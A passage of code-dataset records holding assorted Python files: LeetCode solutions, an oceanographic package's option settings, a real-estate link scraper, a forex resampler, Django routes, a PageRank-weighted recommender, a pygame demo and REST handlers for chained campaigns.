self.isSameTree(p.right, q.right)\n else:\n return p is q\n \n def isSameTree_1(self, p: TreeNode, q: TreeNode) -> bool:\n s0, s1 = [], []\n if p: s0.append(p)\n if q: s1.append(q)\n while s0 and s1:\n n0, n1 = s0.pop(), s1.pop()\n if n0.val != n1.val: return False\n\n if n0.left: s0.append(n0.left)\n if n1.left: s1.append(n1.left)\n if len(s0) != len(s1): return False\n \n if n0.right: s0.append(n0.right)\n if n1.right: s1.append(n1.right)\n if len(s0) != len(s1): return False\n \n return len(s0) == len(s1)\n# @lc code=end","sub_path":"leetcode/100.same-tree.py","file_name":"100.same-tree.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"503551656","text":"\"\"\"\nThis module manage options of the package\n\n# Like always, largely inspired by xarray code:\n# https://github.com/pydata/xarray/blob/cafab46aac8f7a073a32ec5aa47e213a9810ed54/xarray/core/options.py\n\"\"\"\nimport os\nfrom argopy.errors import InvalidOption, OptionValueError\n\n# Define option names as seen by users:\nDATA_SOURCE = \"src\"\nLOCAL_FTP = \"local_ftp\"\nDATASET = \"dataset\"\nDATA_CACHE = \"cachedir\"\nUSER_LEVEL = \"mode\"\nAPI_TIMEOUT = \"api_timeout\"\n\n# Define the list of available options and default values:\nOPTIONS = {\n DATA_SOURCE: \"erddap\",\n LOCAL_FTP: \".\",\n DATASET: \"phy\",\n DATA_CACHE: os.path.expanduser(os.path.sep.join([\"~\", \".cache\", \"argopy\"])),\n USER_LEVEL: \"standard\",\n API_TIMEOUT: 60\n}\n\n# Define the list of possible values\n_DATA_SOURCE_LIST = frozenset([\"erddap\", \"localftp\", \"argovis\"])\n_DATASET_LIST = frozenset([\"phy\", \"bgc\", \"ref\"])\n_USER_LEVEL_LIST = frozenset([\"standard\", \"expert\"])\n\n\n# Define how to validate options:\ndef _positive_integer(value):\n return isinstance(value, int) and value > 0\n\n\n_VALIDATORS = {\n DATA_SOURCE: _DATA_SOURCE_LIST.__contains__,\n LOCAL_FTP: os.path.exists,\n DATASET: _DATASET_LIST.__contains__,\n DATA_CACHE: os.path.exists,\n USER_LEVEL: _USER_LEVEL_LIST.__contains__,\n API_TIMEOUT: _positive_integer,\n}\n\n\nclass set_options:\n \"\"\"Set options for argopy.\n\n List of options:\n\n - `dataset`: Define the Dataset to work with.\n Default: `phy`. Possible values: `phy`, `bgc` or `ref`.\n - `src`: Source of fetched data.\n Default: `erddap`. Possible values: `erddap`, `localftp`, `argovis`\n - `local_ftp`: Absolute path to a local GDAC ftp copy.\n Default: `.`\n - `cachedir`: Absolute path to a local cache directory.\n Default: `~/.cache/argopy`\n - `mode`: User mode.\n Default: `standard`. Possible values: `standard` or `expert`.\n - `api_timeout`: Define the time out of internet requests to web API, in seconds.\n Default: 120\n\n You can use `set_options` either as a context manager:\n >>> import argopy\n >>> with argopy.set_options(src='localftp'):\n >>> ds = argopy.DataFetcher().float(3901530).to_xarray()\n\n Or to set global options:\n >>> argopy.set_options(src='localftp')\n\n \"\"\"\n\n def __init__(self, **kwargs):\n self.old = {}\n for k, v in kwargs.items():\n if k not in OPTIONS:\n raise ValueError(\n \"argument name %r is not in the set of valid options %r\"\n % (k, set(OPTIONS))\n )\n\n if k in _VALIDATORS and not _VALIDATORS[k](v):\n raise OptionValueError(f\"option {k!r} given an invalid value: {v!r}\")\n self.old[k] = OPTIONS[k]\n self._apply_update(kwargs)\n\n def _apply_update(self, options_dict):\n # for k, v in options_dict.items():\n # if k in _SETTERS:\n # _SETTERS[k](v)\n OPTIONS.update(options_dict)\n\n def __enter__(self):\n return\n\n def __exit__(self, type, value, traceback):\n self._apply_update(self.old)\n","sub_path":"argopy/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"433803073","text":"from typing import Text\nimport selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup\nimport requests\nfrom threading import Thread, RLock\nimport time\nimport random\nfrom random import randint\nimport csv\n\n\n#Threads to get all houses links and write it to a txt file:\nclass ImmoLinks(Thread):\n def __init__(self, link):\n Thread.__init__(self)\n self.link = link\n\n def run(self):\n driver.get(self.link)\n soup = BeautifulSoup(driver.page_source, features='lxml')\n for elem in soup.find_all('a', attrs={\"class\": \"card__title-link\"}):\n txt_list = open(\"./houses_links.txt\", 'a')\n txt_list.write(elem.get(\"href\"))\n txt_list.write(\"\\n\")\n\n\n#Web scraping\ndriver = webdriver.Chrome(executable_path='C:\\Program Files\\Google\\Chrome\\Application\\chromedriver.exe')\n\n#Click the cookies button after open website:\ndriver.get('https://www.immoweb.be/en/search/house/for-sale?countries=BE&page=1&orderBy=relevance')\ntime.sleep(random.uniform(1.0, 4.0))\ncookie_button = driver.find_element_by_xpath('/html/body/div[4]/div[4]/div[2]/div/div[2]/div[1]/button')\ncookie_button.click()\ntime.sleep(random.uniform(1.0, 2.0))\n\n#Get all houses links from immoweb \"for-sale\" page=1:\nsoup = BeautifulSoup(driver.page_source, features='lxml')\nfor elem in soup.find_all('a', attrs={\"class\": \"card__title-link\"}):\n txt_list = open(\"./houses_links.txt\", 'a')\n txt_list.write(elem.get(\"href\"))\n txt_list.write(\"\\n\")\n\nindex = 2\nfor item in range(331):\n immo_url = 'https://www.immoweb.be/en/search/house/for-sale?countries=BE&page=1&orderBy=relevance'\n next_url = immo_url.replace('page=1', f'page={index}')\n thread = ImmoLinks(next_url)\n thread.start()\n thread.join()\n index += 1\n\n","sub_path":"immo_links_scraping_v03.py","file_name":"immo_links_scraping_v03.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"190219135","text":"import pandas as pd\nimport numpy as np\n\ninput_file = \"C:/Users/Administrator/Desktop/Data/USDNOK.FXCM.asc\"\nba_ready_file = \"C:/Users/Administrator/Desktop/BaData/BA_USDNOK_15min.txt\"\n\ndf = pd.read_csv(input_file,index_col=0, parse_dates=[[0,1]], delimiter=',')\ndf.head()\ndf_open = df['Open'].resample('15Min').ohlc()\ndf_high = df['High'].resample('15Min').ohlc()\ndf_low = df['Low'].resample('15Min').ohlc()\ndf_close = df['Close'].resample('15Min').ohlc()\ndf_vol = df['TotalVolume'].resample('15Min').ohlc()\n\ndf_resample = pd.concat([df_open,df_high,df_low,df_close])\ndf_resample = df_resample.dropna()\n\n\n\n# ----------------------\n# Do NOT Change\n#\nfh = open(ba_ready_file, 'w')\nfh.write(\"Date,Time,Open,High,Low,Close,Vol,OI\\n\")\nfor d,o,h,l,c in zip(df_resample.index,df_resample['open'],df_resample['high'],df_resample['low'],df_resample['close']):\n fh.write(\"%s,%s,%.5f,%.5f,%.5f,%.5f,%d,%d\\n\" % (d.strftime('%m/%d/%Y'),d.strftime('%H:%M'),o,h,l,c,0,0))\nfh.close()","sub_path":"TimeResampler.py","file_name":"TimeResampler.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"654015811","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', auth_views.login),\n url(r'^logout/', auth_views.logout),\n url(r'^secure/', include('certchain.urls', namespace='certchain')),\n url(r'^public/', include('public.urls', namespace='public')),\n)\n","sub_path":"admin/admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"365738424","text":"import pandas as pd\nimport numpy as np\nimport math\n\nclass dataset():\n\n def __init__(self,nama_dataset):\n print(nama_dataset)\n self.matrix_dataset=pd.read_csv(nama_dataset)\n \n def matrix_rm(self):\n self.matrix_rm = pd.DataFrame(self.matrix_dataset, index=np.arange(1, self.matrix_dataset[\"User ID\"].max() + 1),columns=np.array(1, self.matrix_dataset[\"Movie ID\"].max() + 1))\n for i in range((len(self.matrix_dataset.index))):\n user = self.matrix_dataset.at[i, \"User ID\"]\n film = self.matrix_dataset.at[i, \"Movie ID\"]\n rating = self.matrix_dataset.at[i, \"Rating\"]\n self.matrix_rm.at[user, film] = rating\n\n #convert NaN to 0\n #for item in self.matrix_rm.columns:\n # self.matrix_rm[item].fillna(0.0, inplace=True)\n return self.matrix_rm\n\n def matrix_crm(self,jml_user):\n self.matrix_crm = pd.DataFrame(index=np.arange(1, jml_user + 1), columns=np.arange(1, jml_user + 1))\n for user in self.matrix_rm.index:\n for user_pembanding in self.matrix_rm.index:\n if user == user_pembanding:\n self.matrix_crm.at[user, user_pembanding] = 0\n continue\n temp = 0\n for item in self.matrix_rm.columns:\n if self.matrix_rm.at[user, item] > 0 and self.matrix_rm.at[user_pembanding, item] > 0:\n temp += 1\n self.matrix_crm.at[user, user_pembanding] = temp\n print(user+1, \"dan\", user_pembanding+1,\":\",temp)\n return self.matrix_crm\n\n def matrix_cm(self):\n self.matrix_cm = self.matrix_crm\n for user in self.matrix_crm.index:\n c = self.matrix_crm.sum(axis=1, skipna=True)\n for item in self.matrix_crm.columns:\n if self.matrix_crm.at[user, item] > 0:\n data_lama = self.matrix_crm.at[user,item]\n print(data_lama)\n data_baru = data_lama / c[user]\n print(data_baru)\n self.matrix_cm.at[user, item] = data_baru\n return self.matrix_cm\n\n def pageRank(self,alpha=0.5,nilai_error=0.001):\n self.kolom_iterasi=0\n jml_user=len(self.matrix_rm.index)\n self.matrix_pageRank = pd.DataFrame(index=np.arange(1, jml_user + 1))\n self.matrix_pageRank[0] = 0.2\n\n def cek_selisih(kolom_iterasi, batas_error): #ecluidean distance\n temp_nilai = 0\n for user_rank in self.matrix_pageRank.index:\n temp_nilai += (self.matrix_pageRank.at[user_rank, kolom_iterasi + 1] - self.matrix_pageRank.at[\n user_rank, kolom_iterasi])**2\n selisih_error = math.sqrt(temp_nilai)\n if selisih_error < batas_error:\n ketemu = True\n else:\n ketemu=False\n self.kolom_iterasi+=1\n return ketemu\n\n def list_uk(): #buat cari node tetangga user\n dict_list_uk = {}\n for user_n in (self.matrix_cm.index):\n temp = 0\n uk = []\n for user_k in (self.matrix_cm.columns):\n if self.matrix_cm.at[user_n, user_k] > 0:\n temp += 1\n uk.append(user_k)\n dict_list_uk[user_n] = uk\n return dict_list_uk\n\n while True:\n for user in self.matrix_cm.index:\n temp = 0\n print(\"UR User : \", user)\n for out_user in list_uk()[user]:\n temp += self.matrix_pageRank.at[out_user, self.kolom_iterasi] * self.matrix_cm.at[out_user, user]\n print(\"data uk : \", self.matrix_pageRank.at[out_user, self.kolom_iterasi], \"data cm : \", self.matrix_cm.at[out_user, user], \"hasil uk*cm : \", temp)\n hasil = ((1 - alpha ) * self.matrix_pageRank.at[user, self.kolom_iterasi]) + (alpha * temp)\n print(\"data un : \", self.matrix_pageRank.at[user, self.kolom_iterasi], \"hasil ur : \", hasil)\n self.matrix_pageRank.at[user, self.kolom_iterasi + 1] = hasil\n if cek_selisih(self.kolom_iterasi,nilai_error)==True:\n break\n\n return self.matrix_pageRank\n\n def matrix_s(self,jml_user,jml_item):\n\n matrix_temp_nilai_total_user = self.matrix_rm.sum(axis=1, skipna=True)\n matrix_temp_nilai_rata_user=matrix_temp_nilai_total_user\n for user in self.matrix_rm.index:\n list_total_user = []\n for item in self.matrix_rm.columns:\n if self.matrix_rm.at[user, item] > 0:\n list_total_user.append(item)\n matrix_temp_nilai_rata_user[user] = float(matrix_temp_nilai_total_user[user] / len(list_total_user))\n print(matrix_temp_nilai_rata_user)\n print(self.matrix_rm)\n\n self.matrix_s=pd.DataFrame(index=np.arange(1, jml_user + 1), columns=np.arange(1, jml_item + 1))\n for user in self.matrix_rm.index:\n print(self.matrix_rm.loc[user],matrix_temp_nilai_rata_user[user])\n\n self.matrix_s.loc[user] = self.matrix_rm.loc[user]-matrix_temp_nilai_rata_user[user]\n\n return self.matrix_s\n\n def matrix_similarity_userrank(self,input_user=1):\n\n def cari_user(item_a, item_b):\n irisan_user_pada_item_a_b = []\n for user in self.matrix_s.index:\n if user != input_user:\n if not math.isnan(self.matrix_s.at[user, item_a]) and not math.isnan(self.matrix_s.at[user, item_b]):\n irisan_user_pada_item_a_b.append(user)\n else:\n continue\n print(\"user yang merating item \", item_a, item_b, \": user \", irisan_user_pada_item_a_b)\n return irisan_user_pada_item_a_b\n\n def hitung_similarity(item_a, item_b, list_irisan_a_b):\n atas = 0\n bawah_kiri = 0\n bawah_kanan = 0\n l_atas = []\n l_bawah_kiri = []\n l_bawah_kanan = []\n for user in list_irisan_a_b:\n kolom_terakhir = (self.matrix_pageRank.columns[-1])\n print(\"pagerank user\", user, \"= \", self.matrix_pageRank.at[user, kolom_terakhir], \"**2:\",self.matrix_pageRank.at[user, kolom_terakhir] ** 2)\n\n atas += self.matrix_s.at[user, item_a] * self.matrix_s.at[user, item_b] * (self.matrix_pageRank.at[\n user, kolom_terakhir] ** 2) # str karena tipe data kolom pagerank adlh string\n l_atas.append(self.matrix_s.at[user, item_a] * self.matrix_s.at[user, item_b] * (self.matrix_pageRank.at[user, kolom_terakhir] ** 2))\n print(\"similaritas \", user, item_a, \":\", self.matrix_s.at[user, item_a], \"dan\", user, item_b, \":\",self.matrix_s.at[user, item_b], \"userrank\", user, \":\", (self.matrix_pageRank.at[user, kolom_terakhir] ** 2))\n\n bawah_kiri += (self.matrix_s.at[user, item_a] ** 2) * (self.matrix_pageRank.at[user, kolom_terakhir] ** 2)\n l_bawah_kiri.append((self.matrix_s.at[user, item_a] ** 2) * (self.matrix_pageRank.at[user, kolom_terakhir] ** 2))\n print(\"similaritas \", user, item_a, \":\", self.matrix_s.at[user, item_a] ** 2, \"userrank\", user, \":\",self.matrix_pageRank.at[user, kolom_terakhir])\n\n bawah_kanan += (self.matrix_s.at[user, item_b] ** 2) * (self.matrix_pageRank.at[user, kolom_terakhir] ** 2)\n l_bawah_kanan.append((self.matrix_s.at[user, item_b] ** 2) * (self.matrix_pageRank.at[user, kolom_terakhir] ** 2))\n print(\"similaritas \", user, item_b, \":\", self.matrix_s.at[user, item_b] ** 2, \"userrank\", user, \":\", self.matrix_pageRank.at[user, kolom_terakhir])\n\n bawah = (math.sqrt(bawah_kiri)) * (math.sqrt(bawah_kanan))\n hasil = float(atas / bawah)\n print(\"sum atas \", l_atas)\n print(\"sum bawah kiri \", l_bawah_kiri)\n print(\"sum bawah kanan \", l_bawah_kanan)\n print(\"atas \", atas)\n print(\"bawah kiri \", math.sqrt(bawah_kiri))\n print(\"bawah kanan \", math.sqrt(bawah_kanan))\n print(\"bawah \", bawah)\n print(\"similaritas \", item_a, item_b)\n print(\"hasil\", hasil, \">>>>>>>>>>>\\n\")\n return hasil\n\n data_similaritas_user = pd.DataFrame(dtype=float)\n\n temp_item_kosong = []\n temp_item_terisi = []\n print(input_user)\n\n for item in (self.matrix_s.columns):\n if math.isnan(self.matrix_s.at[input_user, item]):\n temp_item_kosong.append(item)\n else:\n temp_item_terisi.append(item)\n\n for item_target in temp_item_kosong:\n for item_pembanding in temp_item_terisi:\n list_irisan_a_b = cari_user(item_target, item_pembanding)\n if len(list_irisan_a_b) == 0:\n continue\n else:\n data_similaritas_user.at[item_target, item_pembanding] = hitung_similarity(item_target, item_pembanding,list_irisan_a_b)\n print(data_similaritas_user)\n return data_similaritas_user\n\n\n def matrix_similarity_traditional(self,input_user=1):\n\n def cari_user(item_a, item_b):\n irisan_user_pada_item_a_b = []\n for user in self.matrix_s.index:\n if user != input_user:\n if not math.isnan(self.matrix_s.at[user, item_a]) and not math.isnan(self.matrix_s.at[user, item_b]):\n irisan_user_pada_item_a_b.append(user)\n else:\n continue\n print(\"user yang merating item \", item_a, item_b, \": user \", irisan_user_pada_item_a_b)\n return irisan_user_pada_item_a_b\n\n def hitung_similarity(item_a, item_b, list_irisan_a_b):\n atas = 0\n bawah_kiri = 0\n bawah_kanan = 0\n l_atas = []\n l_bawah_kiri = []\n l_bawah_kanan = []\n for user in list_irisan_a_b:\n atas += self.matrix_s.at[user, item_a] * self.matrix_s.at[user, item_b]\n l_atas.append(self.matrix_s.at[user, item_a] * self.matrix_s.at[user, item_b])\n bawah_kiri += self.matrix_s.at[user, item_a] ** 2\n l_bawah_kiri.append(self.matrix_s.at[user, item_a] ** 2)\n\n bawah_kanan += self.matrix_s.at[user, item_b] ** 2\n l_bawah_kanan.append(self.matrix_s.at[user, item_b] ** 2)\n bawah = (math.sqrt(bawah_kiri)) * (math.sqrt(bawah_kanan))\n\n hasil = float(atas / bawah)\n\n print(\"sum atas \", l_atas)\n print(\"sum bawah kiri \", l_bawah_kiri)\n print(\"sum bawah kanan \", l_bawah_kanan)\n print(\"atas \", atas)\n print(\"bawah kiri \", math.sqrt(bawah_kiri))\n print(\"bawah kanan \", math.sqrt(bawah_kanan))\n print(\"bawah \", bawah)\n print(\"similaritas \", item_a, item_b)\n print(\"hasil\", hasil, \">>>>>>>>>>>\\n\")\n return hasil\n\n data_similaritas_user = pd.DataFrame(dtype=float)\n\n temp_item_kosong = []\n temp_item_terisi = []\n print(input_user)\n\n for item in (self.matrix_s.columns):\n if math.isnan(self.matrix_s.at[input_user, item]):\n temp_item_kosong.append(item)\n else:\n temp_item_terisi.append(item)\n\n for item_target in temp_item_kosong:\n for item_pembanding in temp_item_terisi:\n list_irisan_a_b = cari_user(item_target, item_pembanding)\n if len(list_irisan_a_b) == 0:\n continue\n else:\n data_similaritas_user.at[item_target, item_pembanding] = hitung_similarity(item_target, item_pembanding,list_irisan_a_b)\n print(data_similaritas_user)\n return data_similaritas_user\n\n def matrix_prediksi(self,tipe,input_K=2):\n\n def cari_tetangga(item_target, banyak_tetangga):\n temp_per_item_target = data.loc[item_target] # select per index\n temp_per_item_target.sort_values(ascending=False, inplace=True) # sorting desc\n temp_per_item_target = temp_per_item_target.iloc[:banyak_tetangga] # spit berdasarkan max k\n print(temp_per_item_target)\n list_QtU_item_k = temp_per_item_target.index.tolist() # get index/item dari data stlh disorting convert ke list\n print(list_QtU_item_k)\n return list_QtU_item_k\n\n def hitung_function(user_target, item_target, list_item_similar_qtu):\n atas = 0.0\n bawah = 0.0\n\n for item_similar in list_item_similar_qtu:\n atas += data.at[item_target, item_similar] * self.matrix_rm.at[user_target, item_similar]\n bawah += math.fabs(data.at[item_target, item_similar])\n print(\"similaritas item(\", item_target, item_similar, \")= \", data.at[item_target, item_similar],\" * rating user item(\", user_target, item_similar, \")= \",self.matrix_rm.at[user_target, item_similar])\n print(\"absolute similaritas item(\", item_target, item_similar, \")= \",math.fabs(data.at[item_target, item_similar]))\n hasil = float(atas) / float(bawah)\n print(hasil)\n return hasil\n\n if tipe==\"traditional\":\n self.matrix_rm_plus_prediksi=self.matrix_rm.copy()\n for user_target in self.matrix_rm.index:\n data = self.matrix_similarity_traditional(user_target)\n data_hasil = {}\n for item_target in data.index:\n QtU = cari_tetangga(item_target, input_K)\n hasil = hitung_function(user_target, item_target, QtU)\n data_hasil[item_target] = hasil\n self.matrix_rm_plus_prediksi.at[user_target, item_target] = hasil\n\n return self.matrix_rm_plus_prediksi\n\n elif tipe == \"userrank\":\n self.matrix_rm_plus_prediksi_userrank = self.matrix_rm.copy()\n for user_target in self.matrix_rm.index:\n data = self.matrix_similarity_userrank(user_target)\n data_hasil = {}\n for item_target in data.index:\n QtU = cari_tetangga(item_target, input_K)\n hasil = hitung_function(user_target, item_target, QtU)\n data_hasil[item_target] = hasil\n self.matrix_rm_plus_prediksi_userrank.at[user_target, item_target] = hasil\n\n return self.matrix_rm_plus_prediksi_userrank\n\n def lihat_top_n(self,tipe=\"traditional\",user_target=1,top_n=2):\n\n if tipe==\"traditional\":\n data_top_n = self.matrix_rm_plus_prediksi.loc[user_target]\n for item in self.matrix_rm.columns:\n if not math.isnan(self.matrix_rm.at[user_target, item]):\n del data_top_n[item]\n\n data_top_n.sort_values(ascending=False, inplace=True) # sorting desc\n data_top_n = data_top_n.iloc[:top_n]\n return (data_top_n)\n\n\n elif tipe == \"userrank\":\n data_top_n = self.matrix_rm_plus_prediksi_userrank.loc[user_target]\n for item in self.matrix_rm.columns:\n if not math.isnan(self.matrix_rm.at[user_target, item]):\n del data_top_n[item]\n\n data_top_n.sort_values(ascending=False, inplace=True) # sorting desc\n data_top_n = data_top_n.iloc[:top_n]\n return (data_top_n)\n\n #for item in self.matrix_rm.columns:\n\n\n\nfold=1\nfor i in range (1,fold+1):\n afni=dataset(\"base_\"+str(i)+\"_dataset.csv\")\n #print(afni.matrix_dataset)\n\n (afni.matrix_rm())\n total_user=len(afni.matrix_rm.index)\n total_item=len(afni.matrix_rm.columns)\n (afni.matrix_crm(total_user))\n (afni.matrix_cm())\n (afni.pageRank(nilai_error=0.001))\n #(afni.matrix_rm)\n \n print(afni.matrix_s(total_user,total_item))\n afni.matrix_rm.to_csv(\"matrik_rating_base_\"+str(i)+\".csv\")\n\n print(\">>>>>>>>>>>>>>>>>>>\")\n print(afni.matrix_prediksi(\"traditional\",2))\n print(afni.matrix_rm_plus_prediksi)\n print(afni.matrix_rm_plus_prediksi.to_csv(\"base_\"+str(i)+\"_matrik_prediksi_traditional_itembase.csv\"))\n #print(afni.lihat_top_n(\"traditional\",5,2))\n\n\n #print(afni.matrix_prediksi(\"userrank\",2))\n #print(afni.matrix_rm_plus_prediksi_userrank)\n #print(afni.matrix_rm_plus_prediksi_userrank.to_csv(\"base_\"+str(i)+\"_matrik_prediksi_userrank_itembase.csv\"))\n #print(afni.lihat_top_n(\"userrank\",5,2))\n\n \n","sub_path":"real-dataset(1 program)/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":16700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"244468725","text":"'''\n Escribir un programa que pida al usuario un numero entero y muestre por pantalla un triangulo rectangulo\n\n *\n **\n ***\n ****\n *****\n'''\n\nlon = input('Elije el tamaño del arbol: ')\n\ntry:\n lon=int(lon)\nexcept:\n print('solo se pueden poner numeros')\n\nfor i in range(lon):\n print('*' * (i + 1))","sub_path":"arbol.py","file_name":"arbol.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"251127179","text":"from gates import xor\n\n\ndef full_adder(first,last):\n c_out = 0\n result = ''\n for i in range(len(first)-1,-1,-1):\n sum_ = xor(xor(int(first[i]),int(last[i])),c_out)\n c_out = (int(first[i]) and int(last[i])) or (c_out and (xor(int(first[i]),int(last[i]))))\n result += str(sum_)\n result+=str(c_out)\n return result[::-1]","sub_path":"byte_adder.py","file_name":"byte_adder.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"193266637","text":"import pygame, sys\n\npygame.init()\n\nscreen = pygame.display.set_mode((500, 500))\n\n# 加载全部字体\nfonts = pygame.font.get_fonts()\n#print(front)\n\nred = pygame.Color(255, 0, 0)\n\n# 加粗,斜体\n# 使用系统默认的字体文件\nfont = pygame.font.SysFont('华文新魏', 40, True, True)\n# 使用项目中字体\n# font = gygame.font.Font('')\n\n\n# 文字对象\ntext = font.render(\"得分\", False, red)\ntext2 = font.render(\"TEST\", False, red)\n\n\n# 音乐\nbg_music = pygame.mixer.music.load('/pygame/a_demo\\\\game_bg_music.mp3')\npygame.mixer.music.play(-1)\n\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n\n # 绘制图形\n screen.blit(text, (20, 20))\n screen.blit(text2, (120, 120))\n # 更新\n pygame.display.flip()","sub_path":"pygame/a_demo/use_font.py","file_name":"use_font.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"514782109","text":"import flask\n\nimport json\n\nfrom rest_api.RestAPIMethod import RESTResource, GetRESTResource\nfrom couchdb_layer.mcm_database import Database\nfrom model_layer.chained_campaign import ChainedCampaign\nfrom tools.user_management import Roles\n\n\nclass GetChainedCampaign(GetRESTResource):\n\n def __init__(self):\n GetRESTResource.__init__(self, 'chained_campaigns')\n\n\nclass CreateChainedCampaign(RESTResource):\n\n allowed_role = Roles.production_manager\n\n def __init__(self):\n RESTResource.__init__(self)\n self.db_name = 'chained_campaigns'\n self.before_request()\n\n def put(self):\n \"\"\"\n Create a chained campaign from the provide json content\n \"\"\"\n data = flask.request.data\n if not data:\n return self.output_text({'results': False,\n 'message': 'No data was found in request'},\n code=400)\n\n chained_campaign = ChainedCampaign(json_input=json.loads(data.decode('utf-8')))\n chained_campaign_campaigns = chained_campaign.get('campaigns')\n if len(chained_campaign_campaigns) < 2:\n return self.output_text({'results': False,\n 'message': 'Chained campaign must have at least two campaigns'},\n code=400)\n\n campaigns_db = Database('campaigns')\n flows_db = Database('flows')\n if not campaigns_db.prepid_exists(chained_campaign_campaigns[0]['campaign']):\n return self.output_text({'results': False,\n 'message': 'Campaign \"%s\" does not exist' % (chained_campaign_campaigns[0]['campaign'])},\n code=400)\n\n if not campaigns_db.get(chained_campaign_campaigns[0]['campaign']).get('is_root'):\n return self.output_text({'results': False,\n 'message': 'Campaign \"%s\" cannot be root' % (chained_campaign_campaigns[0]['campaign'])},\n code=400)\n\n chained_campaign_id = 'chain_%s' % (chained_campaign_campaigns[0]['campaign'])\n for index, campaign_flow_pair in enumerate(chained_campaign_campaigns):\n campaign_id = campaign_flow_pair['campaign']\n if not campaigns_db.prepid_exists(campaign_id):\n return self.output_text({'results': False,\n 'message': 'Campaign \"%s\" does not exist' % (campaign_id)},\n code=400)\n\n if index == 0:\n continue\n\n flow_id = campaign_flow_pair['flow']\n flow = flows_db.get(flow_id)\n if not flow:\n return self.output_text({'results': False,\n 'message': 'Flow \"%s\" does not exist' % (flow_id)},\n code=400)\n\n previous_campaign_id = chained_campaign_campaigns[index - 1]['campaign']\n if previous_campaign_id not in flow.get('source_campaigns'):\n return self.output_text({'results': False,\n 'message': 'Campaign \"%s\" is not in \"%s\" source campaigns' % (previous_campaign_id,\n flow_id)},\n code=400)\n\n if campaign_id != flow.get('target_campaign'):\n return self.output_text({'results': False,\n 'message': 'Campaign \"%s\" is not \"%s\" target campaign' % (campaign_id,\n flow_id)},\n code=400)\n\n chained_campaign_id += '_%s' % (flow_id)\n\n chained_campaigns_db = Database('chained_campaigns')\n if chained_campaigns_db.prepid_exists(chained_campaign_id):\n return self.output_text({'results': False,\n 'message': 'Chained campaign \"%s\" already exists' % (chained_campaign_id)},\n code=409)\n\n chained_campaign.set('_id', chained_campaign_id)\n chained_campaign.set('prepid', chained_campaign_id)\n # update history\n chained_campaign.update_history(None, 'created', chained_campaign_id)\n if not chained_campaigns_db.save(chained_campaign.json()):\n self.logger.error('Could not save chained campaign \"%s\" to database' % (chained_campaign_id))\n return self.output_text({'results': False,\n 'message': 'Error saving chained campaign to database'},\n code=500)\n\n return self.output_text({'results': True, 'message': ''})\n\n\nclass UpdateChainedCampaign(RESTResource):\n\n allowed_role = Roles.production_manager\n\n def __init__(self):\n RESTResource.__init__(self)\n self.db_name = 'chained_campaigns'\n self.before_request()\n\n def put(self):\n \"\"\"\n Update a chained campaign from the provide json content\n \"\"\"\n return self.output_text({'results': False, 'message': 'Not implemented'}, code=501)\n","sub_path":"rest_api/ChainedCampaignActions.py","file_name":"ChainedCampaignActions.py","file_ext":"py","file_size_in_byte":5306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"138245589","text":"#\n# @lc app=leetcode.cn id=93 lang=python3\n#\n# [93] 复原IP地址\n#\n\n# @lc code=start\nclass Solution:\n def restoreIpAddresses(self, s: str) -> List[str]:\n COUNT = 4\n segments, ans = [0]*COUNT, []\n \n def dfs(sid, start):\n # 终止条件\n if sid == COUNT and start == len(s):\n ipaddr = '.'.join([str(m) for m in segments])\n ans.append(ipaddr)\n return\n if sid == COUNT or start == len(s):\n return\n # 搜索过程\n if s[start] == '0': # 除数字0外,不能以0开头,注意这里适合字符'0'比较\n segments[sid] = s[start]\n dfs(sid+1, start+1)\n return\n num = 0\n for i in range(start, len(s)):\n num = num * 10 + int(s[i])\n if 255 >= num > 0:\n segments[sid] = num\n dfs(sid+1, i+1)\n else:\n break\n dfs(0, 0)\n return ans\n \n# @lc code=end\n\n","sub_path":"Week_02/93_复原IP地址.py","file_name":"93_复原IP地址.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"237736150","text":"import nibabel as nib\nfrom voxtox.rtstruct import getPolygons, getStructDict\nfrom voxtox.utility import pointXyzToIjk\nfrom skimage.measure import find_contours\nfrom skimage.filters import gaussian\nimport numpy as np\nfrom skimage import draw\nfrom shapely.geometry import Polygon\nfrom scipy.interpolate import RegularGridInterpolator\nfrom deform.registration import getNiiCoords\n\nclass Contours(object):\n # need to send the structure path to this class\n def __init__( self, structPath = \"\", roiList = [] ):\n super(Contours, self).__init__()\n self.path = structPath\n self.roiList = roiList\n self.structDict = self.getStructures(self.roiList)\n self.polyDict = self.getPolygonDict()\n \n def getStructures( self, roiList ):\n #roiList = getROIList( roi )\n rtStructDict = getStructDict( self.path, roiList )\n # this polygon dict only gets the polygon for the first \n # structure in the list\n contourDict = {}\n for key in rtStructDict.keys():\n name = rtStructDict[key][ \"name\" ]\n allPlanesDict = rtStructDict[key][ \"planes\" ]\n contourDict[name] = 